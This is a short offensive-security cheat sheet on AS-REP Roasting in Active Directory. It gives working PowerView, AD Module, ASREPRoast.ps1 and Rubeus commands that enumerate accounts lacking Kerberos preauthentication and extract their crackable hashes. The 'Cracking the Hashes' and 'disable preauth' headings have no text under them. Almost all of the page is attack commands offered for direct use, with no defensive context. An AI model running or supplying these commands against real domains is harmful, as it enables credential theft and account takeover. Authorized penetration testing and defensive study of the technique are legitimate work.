AS-REP Roasting
Steps to AS-REP Roast
Step 1 - Discover AS-REP Roastable Users
# PowerView_dev
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname
# AD Module
Get-ADUser -Filter {DoesNotRequirePreauth -eq $true} -Properties DoesNotRequirePreAuth | select samaccountnameStep 2 - Grabbing the User Hashes
# ASREPRoast.ps1
. .\ASREPRoast.ps1
Get-ASREPHash -UserName VPN403User
# rubeus.exe
.\Rubeus.exe asreproast
# ASREPRoast.ps1
Invoke-ASREPRoast | flStep 3 - Cracking the Hashes
If You Would Like to Disable Preauth on a User
Last updated